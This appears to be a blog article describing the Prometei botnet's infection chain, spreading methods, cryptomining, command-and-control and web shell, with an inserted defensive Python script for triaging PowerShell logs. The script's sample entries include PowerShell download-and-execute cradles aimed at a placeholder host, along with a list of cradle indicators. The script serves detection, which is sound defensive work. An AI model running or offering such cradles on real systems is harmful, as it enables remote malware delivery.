The digital world is constantly evolving, and unfortunately, so are the cyber threats that come with it. One such threat is the Prometei botnet malware, which has been on the rise since November 2022.
This modular botnet is equipped with a vast array of components, which it uses to infect systems worldwide, harvest credentials, and mine cryptocurrency. In this article, we’ll explore the latest developments of this malware.
Opportunistic Infections Across the Globe
Prometei has infected over 10,000 systems worldwide, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Its infections are both geographically indiscriminate and opportunistic, as it targets vulnerable systems with its sophisticated proliferation methods.
Avoiding Russia: Clues to its Origin?
Interestingly, Prometei avoids attacking systems in Russia, which suggests that the threat actors behind the operation may be based in the country. This modular botnet is known for exploiting the ProxyLogon Microsoft Exchange Server flaws, among other vulnerabilities.
Sophisticated Malware With Advanced Features
Prometei is a cross-platform botnet with financial motivations, and it leverages its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei, known as v3, features improved capabilities that challenge forensic analysis and burrow deeper into victim machines.
Attack Sequence: Download, Retrieve, Spread
The Prometei attack sequence involves executing a PowerShell command to download the malware from a remote server.
Its main module then retrieves the actual crypto-mining payload and other auxiliary components onto the system. Some of these support modules function as spreader programs, which propagate the malware through Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).
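The initial PowerShell download step described above is the point where this sequence is most visible in host logs. As an added example that is not part of the article and is not based on any Prometei sample, the following Python triages constructed PowerShell script-block log entries for download-cradle indicators and, where a Base64 `-EncodedCommand` is present, decodes it so the inner command can be inspected as well. The indicator set, the log lines and the `example.invalid` URLs are assumptions made for illustration.

```python
import base64
import re
from typing import Optional

# Defender-side heuristic indicators of a PowerShell download cradle
# (an assumed set for illustration, not taken from any Prometei sample).
CRADLE_INDICATORS = {
    "DownloadString": r"DownloadString",
    "DownloadFile": r"DownloadFile",
    "Invoke-WebRequest": r"Invoke-WebRequest|\biwr\b",
    "Net.WebClient": r"Net\.WebClient",
    "Invoke-Expression": r"Invoke-Expression|\bIEX\b",
    "Start-BitsTransfer": r"Start-BitsTransfer",
}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(blob: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries UTF-16LE text wrapped in Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_script_block(text: str) -> dict:
    """Return which cradle indicators appear, plus any decoded inner command."""
    decoded = None
    m = ENCODED_FLAG.search(text)
    if m:
        decoded = decode_encoded_command(m.group(1))
    # Scan the visible command with the Base64 blob swapped for its decoded form,
    # so indicators hidden inside the encoding are still found.
    scan = text if decoded is None else text[:m.start(1)] + decoded
    hits = sorted(n for n, p in CRADLE_INDICATORS.items() if re.search(p, scan, re.I))
    return {"indicators": hits, "decoded": decoded, "suspicious": bool(hits)}

def build_encoded(cmd: str) -> str:
    """Helper used only to construct the encoded sample entry below."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

# Constructed sample script-block entries (not real Prometei artefacts).
SAMPLE_LOGS = [
    "Get-ChildItem C:\\Users | Measure-Object",
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')\"",
    "powershell -EncodedCommand "
    + build_encoded("Invoke-WebRequest http://example.invalid/b -OutFile C:\\Temp\\b.exe"),
]

def triage(lines):
    """Pair each log line with its inspection result for analyst review."""
    return [(line, inspect_script_block(line)) for line in lines]
```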
Advanced Features and Self-Update Mechanism
Prometei v3 uses a domain generation algorithm (DGA) to build its command-and-control (C2) infrastructure. It also has a self-update mechanism and an expanded set of commands to harvest sensitive data and commandeer the host. Finally, the malware deploys an Apache web server that’s bundled with a PHP-based web shell, which can execute Base64-encoded commands and carry out file uploads.
Continuously Evolving Threat
As threat researchers have previously asserted, Prometei’s operators are continuously updating the botnet and adding functionality. With each new variant, Prometei becomes more sophisticated, making it harder to detect and remove.
To protect your system, it’s crucial to stay vigilant and employ cybersecurity measures such as keeping your software updated and avoiding suspicious emails and downloads.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among other credentials, he is certified in CISSP, CISA, CISM, ITIL, COBIT and PRINCE2, but his broad knowledge and technical management capabilities go beyond these certifications. He enjoys acquiring new skills in penetration testing, cloud technologies, virtualization, network security, IoT and more.